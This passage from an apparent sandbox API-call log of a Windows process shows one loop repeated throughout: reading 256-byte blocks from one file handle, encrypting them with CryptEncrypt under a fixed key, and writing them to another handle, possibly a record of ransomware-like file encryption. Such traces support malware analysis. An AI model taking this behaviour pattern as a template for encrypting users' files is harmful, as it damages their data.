returned 1 [0168.152] GetLastError () returned 0x0 [0168.152] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.153] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.153] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.153] GetLastError () returned 0x0 [0168.153] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.153] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.153] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.153] GetLastError () returned 0x0 [0168.153] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.153] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.153] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.153] GetLastError () returned 0x0 [0168.153] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.153] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.153] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.153] GetLastError () returned 0x0 [0168.153] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.153] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.153] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.153] GetLastError () returned 0x0 [0168.153] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.153] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.153] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.153] GetLastError () returned 0x0 [0168.153] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.153] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.154] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.154] GetLastError () returned 0x0 [0168.154] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.154] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.154] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.154] GetLastError () returned 0x0 [0168.154] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.154] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.154] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.154] GetLastError () returned 0x0 [0168.154] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.154] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.154] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.154] GetLastError () returned 0x0 [0168.154] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.154] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.154] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.154] GetLastError () returned 0x0 [0168.154] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.154] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.154] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.154] GetLastError () returned 0x0 [0168.154] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.154] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.154] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.154] GetLastError () returned 0x0 [0168.154] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.155] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.155] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.155] GetLastError () returned 0x0 [0168.155] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.155] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.155] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.155] GetLastError () returned 0x0 [0168.155] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.155] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.155] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.155] GetLastError () returned 0x0 [0168.155] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.155] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.155] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.155] GetLastError () returned 0x0 [0168.155] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.155] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.155] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.155] GetLastError () returned 0x0 [0168.155] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.155] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.155] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.155] GetLastError () returned 0x0 [0168.155] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.155] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.156] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.156] GetLastError () returned 0x0 [0168.156] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.156] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.156] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.156] GetLastError () returned 0x0 [0168.156] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.156] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.156] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.156] GetLastError () returned 0x0 [0168.156] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.156] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.156] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.156] GetLastError () returned 0x0 [0168.156] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.156] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.156] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.156] GetLastError () returned 0x0 [0168.156] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.156] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.156] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.156] GetLastError () returned 0x0 [0168.156] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.156] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.157] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.157] GetLastError () returned 0x0 [0168.157] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.157] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.157] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.157] GetLastError () returned 0x0 [0168.157] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.157] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.157] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.157] GetLastError () returned 0x0 [0168.157] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.157] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.157] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.157] GetLastError () returned 0x0 [0168.157] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.157] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.157] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.157] GetLastError () returned 0x0 [0168.157] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.157] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.157] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.157] GetLastError () returned 0x0 [0168.157] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.157] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.158] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.158] GetLastError () returned 0x0 [0168.158] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, 